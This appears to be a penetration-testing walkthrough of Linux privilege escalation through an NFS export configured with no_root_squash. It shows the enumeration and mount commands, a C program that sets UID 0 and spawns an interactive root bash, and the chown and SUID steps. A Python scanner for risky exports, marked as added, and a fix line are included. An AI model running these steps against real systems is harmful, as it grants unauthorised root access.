Introduction

The compromised machine may be configured to allow certain directories to be mounted by other machines. You can enumerate such directories by running the following command on the victim machine:

```shell
cat /etc/exports
```

![[res/Enumerate Mountable Directories.png]]

You can additionally verify this from your attacker machine by running:

```shell
showmount -e <victim IP>
```

![[res/Confirm Mountable Directories.png]]

If a mountable directory is exported with the no_root_squash option, as is the case here, it can be used for privilege escalation.
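As an added defender-side example, not part of the original write-up, the following Python parses an /etc/exports file and flags the exports that make this escalation possible: no_root_squash, exports open to every host, and the exports(5) pitfall where a space before the option list applies those options to all hosts. The exports file it reads is a constructed sample embedded in the script.

```python
"""Scan /etc/exports for NFS exports that enable the no_root_squash escalation or
hand a share to every host. Added example; the sample below is constructed."""
import re

SAMPLE_EXPORTS = """\
# constructed /etc/exports
/srv/share   10.0.0.0/24(rw,sync,root_squash)
/tmp         *(rw,sync,no_root_squash,no_subtree_check)
/home/data   host1(ro,sync) \\
             10.0.0.5(rw,no_root_squash)
/opt/export  10.0.0.7 (rw)
"""
CLIENT_RE = re.compile(r"^([^(]+)(?:\((.*)\))?$")  # client[(options)]


def parse_exports(text):
    """One record per (path, client); a client without parentheses gets the
    server defaults, which include ro and root_squash."""
    records = []
    for raw in text.replace("\\\n", " ").splitlines():  # join continuations
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *tokens = line.split()
        for tok in tokens or ["*"]:  # bare path: everyone, default options
            if tok.startswith("("):
                # exports(5) pitfall: "host (opts)" applies opts to ALL hosts
                records.append({"path": path, "client": "*", "stray_space": True,
                                "options": tok.strip("()").split(",")})
                continue
            client, opts = CLIENT_RE.match(tok).groups()
            records.append({"path": path, "client": client, "stray_space": False,
                            "options": [o for o in (opts or "").split(",") if o]})
    return records


def risky_exports(records):
    """Return (path, client, reasons) for exports worth fixing."""
    findings = []
    for r in records:
        reasons = []
        if "no_root_squash" in r["options"]:
            reasons.append("no_root_squash: client root acts as root on the server")
        if r["client"] == "*":
            reasons.append("exported to any host")
        if r["stray_space"]:
            reasons.append("space before '(' gives these options to all hosts")
        if reasons:
            findings.append((r["path"], r["client"], reasons))
    return findings
```

The fix for a flagged entry is to drop no_root_squash (root_squash is the default), restrict the client list, and run `exportfs -ra` so the change takes effect.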

We begin by mounting the target directory from the victim to a directory on our machine:

```shell
sudo mount -o rw,vers=3 <victim IP>:/tmp /tmp/root_squash
```

Now, if no_root_squash is configured for the mountable directory, the root user on the attacker machine is mirrored on the victim: file operations performed as root on our side of the mount are honored as root by the NFS server, so files we own as root are owned by root on the victim too. This lets us create a binary in the mounted directory and set its SUID bit from the attacker machine. The victim sees the same ownership and mode bits, so we end up with a root-owned SUID binary on the target whose contents are entirely under our control.

Let's write a simple malicious C executable:

```c
#include <unistd.h>
#include <stdlib.h>

int main(void)
{
    setuid(0); // Set user ID to root (succeeds because the SUID bit gives effective UID 0)
    setgid(0); // Set group ID to root
    system("/bin/bash -i"); // Execute bash now with elevated privileges

    return 0;
}
```

It doesn't matter whether you create the source file on the target or the attacker machine, but you must compile it on the target machine to avoid library version mismatches:

```shell
gcc -o nfs_exploit nfs_exploit.c
```

![[res/Compile On Target.png]]

Next, change the ownership of the compiled binary to root from the attacker machine. Then, again from the attacker machine, set the SUID bit on the binary:

```shell
sudo chown root:root nfs_exploit
sudo chmod +s nfs_exploit
```

![[res/Change Ownership and Permission on the Attacking Machine.png]]

![[res/Ownership and Permissions from the Target's POV.png]]

Finally, execute the malicious binary on the target:

![[res/NFS Exploit.png]]